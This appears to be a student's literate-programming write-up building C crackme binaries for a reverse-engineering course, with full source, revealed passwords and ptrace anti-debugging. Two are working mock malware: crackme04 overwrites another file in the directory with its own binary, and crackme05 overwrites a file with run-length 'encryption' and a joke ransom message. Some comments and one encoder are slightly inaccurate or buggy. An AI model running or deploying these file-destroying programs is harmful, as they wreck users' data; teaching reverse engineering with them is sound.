---
title: Project Phase 1 - Blue Team Binaries
date: '[![Entangled badge](https://img.shields.io/badge/entangled-Use%20the%20source!-%2300aeff){height=1.5%}](https://entangled.github.io/)'
author: Marcus Simpkins ([**@myriacore**](https://gitlab.com/myriacore))
---

<!-- 
Will be used to hide sections I don't really wanna show in the actual paper
-->

**Note:** This file might be a bit inscrutable in gitlab's markdown render, so I
recommend reading this in [the PDF version](submission.pdf) if you're doing
anything other than skimming!

\newcommand{\ignore}[1]{}

I'm gonna try something new here - this document will be an [entangled markdown
file](https://entangled.github.io/), which will be used to both *compile* and
*describe* the inner workings of the binaries I come up with using [Literate
Programming](https://en.wikipedia.org/wiki/Literate_Programming).

The binaries that are described in this document will be located in the `.out`
folder. I've produced 3 Category I binaries, and 2 Category II. The Category
ones are moderately difficult I'd say, but both category II binaries would
probably be pretty time consuming, since they're big files. 

## The Makefile

For now, I'll just use C to make my programs. I'll use the following makefile:

```{.makefile #makefile file=makefile}
CC              = gcc
NOERR           = -Wno-pointer-to-int-cast -Wno-nonnull
CFLAGS          = -s -Wall -Werror $(NOERR)
SOURCE_FILES    = $(wildcard src/*.c)
TARGET_FILES    = $(patsubst src/%.c,.out/%,$(SOURCE_FILES))

# Some reasonable defaults for pandoc
<<makefile-pandoc-args>>

.PHONY: all clean knit

all: clean $(TARGET_FILES)

# crackme03 uses dlsym, so we have to compile with -ldl
.out/crackme03: CFLAGS += -ldl

.out/%: src/%.c
	mkdir -p .out
	$(CC) $< $(CFLAGS) -o $@

clean:
	rm -rf .out

# Create documentation
<<makefile-knit>>
```

\ignore{

Notice that I'll be using `-s` in my `CFLAGS` to make sure all my binaries will
be stripped. This setup isn't that special, otherwise.

If you're interested, here are the make rules I'm using to build this PDF from
markdown:

```{.makefile #makefile-pandoc-args}
pandoc_args += --from markdown+implicit_figures --to pdf
pandoc_args += --self-contained --standalone
pandoc_args += --filter pandoc-plantuml
pandoc_args += --filter pandoc-mermaid
pandoc_args += --filter pandoc-annotate-codeblocks
pandoc_args += --lua-filter gitlab-math.lua
pandoc_args += --lua-filter fix-links.lua
pandoc_args += --katex --template=eisvogel.latex

# For mermaid graphs inside of markdown
export MERMAID_THEME='neutral'
```

```{.makefile #makefile-knit}
# Create documentation
knit: readme.md
	pandoc $(pandoc_args) readme.md -o readme.pdf
```
}

## `crackme01`

The idea for the first crackme will be very very simple - no tricks, just an
algorithm that the user has to reverse. Here's the stub:

```{.c file=src/crackme01.c}
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv) {
  if (argc < 2) {
    printf("Please provide an argument.\n");
    return 1;
  }

  <<crackme01-main-loop>>

 fail:
  printf("No, '%s' is not the correct password.\n", argv[1]);
  return 0;
 success:
  printf("Yes, '%s' is the correct password!\n", argv[1]);
  return 0;
}
```

This sets us up so we can just jump to `success` or `fail` when we decide where
the execution needs to be. Let's talk about the algorithm:

```{.c #crackme01-main-loop}
char lorem[] = "LOREMIPSUM";

for (int i = 0; i < 10; i++) {
  char low = lorem[i] & 0xf;
  lorem[i] = low + lorem[i];
}

if (strcmp(lorem, argv[1]) == 0) goto success;
else goto fail;
```

So, what the algorithm here will do is it'll add the high byte of ascii value
for each character in `lorem` to that same character, and then use that as the
password. **This will ultimately produce the string `"X^TJZRPVZZ"` as the
password.**

## `crackme02`

The idea behind `crackme02` is that I want to make a binary that forces static
analysis by ptracing itself, but is easier to debug dynamically (if it were
possible) than statically.

Here we'll basically use the same stub as `crackme01`:

```{.c file=src/crackme02.c}
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ptrace.h>

int main(int argc, char **argv) {
  if (argc < 2) {
    printf("Please provide an argument.\n");
    return 1;
  }

  <<crackme02-ptrace>>

  <<crackme02-main-loop>>

 success:
  printf("Yes, '%s' is the correct password!\n", argv[1]);
  return 0;
 fail:
  printf("No, '%s' is not the correct password.\n", argv[1]);
  return 0;
}
```

The `ptrace` call will stay pretty simple - I basically copy/pasted it from the
slides. I added a cute little jab in as well, so it's clear that my program
isn't being weird, but it's actually rejecting the debugger. I don't want people
to be confused about what's happening - I want them to be thinking about how to
get around it.

```{.c #crackme02-ptrace}
if (ptrace(PTRACE_TRACEME, 0, 1, 0) < 0) {
  if (argc >= 2) // >:^)
    printf("\nHmmm, that output doesn't look right. Have you\n"
           "tried turning your computer off and on again?\n\n");
  return 1;
}
```

Now for the interesting bit - designing a main loop that's easy to debug, but
difficult to statically look at. I don't wanna just blow their face up with 
a wall of code (so no `cpuid` stuff). I'll however instead just try to have a 
lot of branches and looping structures.

With this in mind, **I'll use the password `"0x424242"`**, and I'll concoct an
algorithm to build it up:

```{.c #crackme02-main-loop}
/* "0x424242" 
 * => 0x30 '0',  [0]
 *    0x78 'x',  [1]
 *    0x34 '4',  [2]
 *    0x32 '2',  [3]
 *    0x34 '4',  [4]
 *    0x32 '2',  [5]
 *    0x34 '4',  [6]
 *    0x32 '2',  [7]
 *    0x00 '\0', [8]
 */
char password[9] = "pAsSwOrD"; // value will be over-written c;
password[8] = '\0';
int base; // 0x74 when i is 1, and 0x30 otherwise.
for (int i = 0; i < 8; i++ ) {
  int can = 0x18; int ack = 0x06; 
  if (i == 1) base = (can * 5) - ack+4;
  else base = (can * 2);
  int offset; // 0 when i is 0, 2 when i is even, 4 when i is odd.
  offset = (1 + ((i+1) % 2)) * 2;
  if (i == 0) offset = 0;
  password[i] = base + offset;
}

if (strcmp(password, argv[1]) == 0) goto success;
else goto fail;
```

This algorithm works by building the string using the `base`, and computing an
offset from the base. The base itself varies a tiny bit, but overall the idea
is that the base is a stable double-digit number, and the offset is an unstable
single-digit number. The offset will jump around the base selecting the correct
value for the character we want to build.

## `crackme03`

In this crackme, I'll use a similar obfuscating technique as before, but instead
of calling `strcmp`, I'll obfuscate that with `dlsym` and `dlopen`. I'll then
obfuscate the `strcmp` string with a similar algorithm to what we saw in
`crackme02`.

```{.c file=src/crackme03.c}
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ptrace.h>
#include <stdbool.h>
#include <dlfcn.h>

int main(int argc, char **argv) {
  if (argc < 2) {
    printf("Please provide an argument.\n");
    return 1;
  }

  <<crackme02-ptrace>>

  <<crackme03-obfuscated-functions>>

  <<crackme03-main-loop>>

 success:
  printf("Yes, '%s' is the correct password!\n", argv[1]);
  return 0;
 fail:
  printf("No, '%s' is not the correct password.\n", argv[1]);
  return 0;
}
```

We'll re-use the `ptrace` code from `crackme02` as well, since I don't plan on
using it any differently, I *just* want to force users into static analysis. 

```{.c #crackme03-obfuscated-functions}
void *handle = dlopen("/lib/x86_64-linux-gnu/libc.so.6", RTLD_LAZY);
char strcmp_sym[7]; /* strcmp */
char strcmp_obf[] = { 0xf3, 0xf4, 0xf2, 0xe3, 0xed, 0xf0, 0x80 };

memcpy(strcmp_sym, &strcmp_obf, 7 * sizeof(char));
for (int i = 0; i < 7; i++)
  strcmp_sym[i] -= 0x80;

// create functions
int (*strcmp_)(const char *, const char *) = dlsym(handle, strcmp_sym);
```

Here, we're obfuscating the string `strcmp`, then dynamically loading it and
binding it to the name `strcmp_`. I just store the characters as hex here at a
really high offset, so it's not really recognizable. The offset in this case
was `0x80`, so I just undo that for every character. 

I'll only do this with `strcmp` for now, just so it's more difficult to detect
where the `strcmp` is. 

```{.c #crackme03-main-loop}
char password[9];   // deadbeef: 64 65 61 64 62 65 65 66
password[8] = '\0'; // deadbeef:  4  5  1  4  2  5  5  6
int base = 0x60;
for (int i = 0; i < 8; i++) {
  switch (i) {
    case 0: { password[i] = base + 4; break; }
    case 1: { password[i] = base + 5; break; }
    case 2: { password[i] = base + 1; break; }
    case 3: { password[i] = base + 4; break; }
    case 4: { password[i] = base + 2; break; }
    case 5: { password[i] = base + 5; break; }
    case 6: { password[i] = base + 5; break; }
    case 7: { password[i] = base + 6; break; }
  }
}

if (strcmp_(password, argv[1]) == 0) goto success;
else goto fail;
```

**I want the password to be `"deadbeef"`**, so I designed an algorithm similar to
`crackme02`'s obfuscation, but with more jumps back and forth in the string. The
idea here is that I want the logic to be really branchy. I get the sense that 
switch case statements will **really** do that for me. 

## `crackme04` 

`crackme04` will be our first category II binary! `crackme04` will try to find a
file that is larger than it and write itself over the beginning of that file.
This is designed to behave like malware trying to evade detection by hiding in
other parts of the system.

Here's the stub we'll be working with:

```{.c file=src/crackme04.c}
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   // memset for zeroing out memory
#include <unistd.h>   // get_cwd
#include <sys/stat.h> // for getting file sizes
#include <dirent.h>   // for reading the directory
#include <limits.h>   // PATH_MAX to make my life easier

<<write-content>>

int main(int argc, char **argv) {
  // full filepath to this binary
  char mypath[PATH_MAX]; getcwd(mypath, PATH_MAX);
  char *myname = argv[0][0] == '.' && argv[0][1] == '/' ? &argv[0][2] : argv[0];
  sprintf(mypath, "%s/%s", mypath, myname);

  // record mysize, the size of this binary
  struct stat fileinfo;
  stat(mypath, &fileinfo);
  size_t mysize = fileinfo.st_size;

  // read the content of this binary into mycontent
  char *mycontent = (char *)malloc(mysize * sizeof(char));
  FILE *me = fopen(mypath, "r");
  if (me == NULL) { free(mycontent); return 1; }
  else if (fread(mycontent, sizeof(char), mysize, me) != mysize)
    return EXIT_FAILURE;

  // zero out fileinfo so we can use it again later
  memset(&fileinfo, 0, sizeof(struct stat));

  <<crackme04-find-file>>

  return 0;
}
```

Nothing *too* fancy, but just enough to not have to write any more logic that
reads or stats the binary.

Next, here's the subroutine I wrote to implement the file-writing logic:

```{.c #write-content}
int write_content(char *path, char *content, size_t size) {
  <<read-tail>>

  <<write-content-and-append-tail>>

  printf("Writing: %s\n", path);
  return 0;
}
```

It's honestly pretty simple. First we'll read the *tail* of the file we're about
to over-write. The tail is the section at the end that won't be overwritten.

Then, we'll write the content we want to the file, and we'll append the tail
back on so the file size stays the same. 

```{.c #read-tail}
// initialize filesize, which will be the size of this binary
struct stat deststat; stat(path, &deststat);
if (deststat.st_size < size) return 1;

// open file up for reading, and jump forwards so we can record
// the "tail" of the file and append it back to the file
FILE *dest = fopen(path, "r");
if (dest == NULL) return 1;
fseek(dest, size, SEEK_SET);
char *tail = (char *)malloc((deststat.st_size - size) * sizeof(char));
fread(tail, sizeof(char), deststat.st_size - size, dest);
fclose(dest);
```

```{.c #write-content-and-append-tail}
// write the content to the file
dest = fopen(path, "w");
if (dest == NULL) return 1;
fwrite(content, sizeof(char), size, dest);
fclose(dest);

// append the tail back to the file to maintain destination filesize
dest = fopen(path, "a");
if (dest == NULL) return 1;
fwrite(tail, sizeof(char), deststat.st_size - size, dest);
fclose(dest);
```

Now, we still have to find the file we'll overwrite. Since the function we just
wrote has error checking logic in it, we can just loop and repeatedly try to write
whatever files we find:

```{.c #crackme04-find-file}
char cwd[PATH_MAX]; getcwd(cwd, PATH_MAX);
char filepath[PATH_MAX]; getcwd(filepath, PATH_MAX);

DIR *dir = opendir(filepath);
if (dir == NULL) return 1;
struct dirent *entry;

while ((entry = readdir(dir)) != NULL) {
  // find a file that's not a directory or this binary
  if (entry->d_type == DT_DIR) continue;
  if (strcmp(entry->d_name, myname) == 0) continue;

  // prepare variables and try to write!
  sprintf(filepath, "%s/%s", cwd, entry->d_name);
  if (write_content(filepath, mycontent, mysize) == 0)
    break;
}
closedir(dir);
```

And that's it! This was probably the most involving of the other files by far.
There's a *lot* of boilerplate, and there's quite a bit going on. However, it's
kinda a neat trick. It's also funny, because the file that gets written to will
think it's a valid ELF binary, and when run, will try to hide *itself* in
another file.

**NOTE:** Since this binary requires a file that's bigger than it to function,
I've included a stock image called `crackme04-companion.jpg` along with my
submission:

![`crackme04-companion.jpg`](https://www.handwerk.com/sites/default/files/2017-08/hide-pain-harold-title-red%20-web.jpg){width=55%}

## `crackme05`

The idea behind this program is that it will "encrypt" a file in the same
directory as it, and then demand bitcoin. This is modelled to mimic ransomware,
actually.  I say "encryption", because it won't be encryption at all - it'll
just be a simple run-length encoding scheme.

The goal (if I'm allowed to provide a goal, here) is to write a python script
that can reverse the run-length encoding scheme.

Here's the stub we'll be working with:

```{.c file=src/crackme05.c}
<<crackme05-imports>>

<<crackme05-rle>>

int main() {
  // open current directory
  char *cwd = getcwd(NULL, PATH_MAX);
  DIR *dir = opendir(cwd);
  if (dir == NULL) return EXIT_FAILURE;

  // setup variables with file info
  char *content;           // content of the chosen file
  char filename[PATH_MAX]; // name of the chosen file
  char filepath[PATH_MAX]; // path to the chosen file
  int filesize;            // size of the chosen file (in bytes)
  FILE *fp;                // file obj (will be reset to null after)
  <<crackme05-choose-file>>

  // clean up a bit
  closedir(dir); free(cwd);

  // perform run-length-encoding
  char *encoded = (char *)malloc((2 * filesize) * sizeof(char));
  int count = runlengthencoder(content, filesize, encoded);

 // overwrite file with encoded content
  fp = fopen(filepath, "w");
  if (fp != NULL)
    fwrite(encoded, sizeof(char), count , fp);
  else return EXIT_FAILURE;
  fclose(fp);

  printf("Your file has been encrypted! If you want access to\n"
         "%s again, you'd better tell JX how cool\n"
         "and difficult-to-reverse my binaries are! c:<\n",
         filename);

  free(encoded); free(content);
  return EXIT_SUCCESS;
}
```

First of all, this was a pretty beefy file, so I used quite a few imports:

```{.c #crackme05-imports}
#include <stdio.h>    // for printf
#include <stdlib.h>   // just in case, pretty much
#include <string.h>   // string stuff! 
#include <unistd.h>   // get_cwd, to get the current directory
#include <limits.h>   // PATH_MAX, to make my life easier
#include <dirent.h>   // Used for reading the directory entries to pick a file
#include <sys/stat.h> // Used to get the size of the file
```

So, this surprised me with how much boilerplate I need just to open a file and
write it back, but I guess that's C for you. Here's the code that I'm using to
pick the file:

```{.c #crackme05-choose-file}
// loop through directory entries until we find a file
struct dirent *entry;
struct stat fileinfo;
while ((entry = readdir(dir)) != NULL) {
  // find a file that's not a directory
  if (entry->d_type == DT_DIR) continue;
  // find a file that's not this file
  if (strcmp(entry->d_name, "crackme05") == 0) continue;

  // find a different file if we can't stat this one
  sprintf(filepath, "%s/%s", cwd, entry->d_name);
  if (stat(filepath, &fileinfo) != 0) continue;

  // prepare variables
  strcpy(filename, entry->d_name);
  filesize = (int) fileinfo.st_size;
  content = (char *)malloc(filesize * sizeof(char));
  fp = fopen(filepath, "r");

  // record file contents
  if (fp == NULL) return EXIT_FAILURE;
  else if (fread(content, sizeof(char), filesize, fp) != filesize)
    return EXIT_FAILURE;

  fclose(fp);
  break;
}
```

Yikes, yeah. Quite a lot. As you can see, all we're *really* doing is picking 
the first file that's not a directory, and that's not the running binary. 

Hopefully it'll be *obvious* that this is all file stuff, and not be too hard to
debug. Anyway, onto the important stuff:

```{.c #crackme05-rle}
int runlengthencoder(char *content, int size, char *out) {
  char *c = content; int i; int s;
  for (i = 0; i < size; s+=2) {
    int o; /* count # of chars after c that are the same as c */
    for (o = 1; *(c+o+i) == *(c+i) && i < size; o++);
    out[s] = o; out[s+1] = *(c+i);
    i += o;
  }
  return s;
}
```

The algorithm that I use here isn't actually all that complicated. It's just 
simple run-length encoding. For every chunk of similar characters, I store the
number of similar characters as a raw byte, and then I store the number of
characters itself.

This example kinda got out of hand with the boilerplate, so I hope it won't be
too hard! 
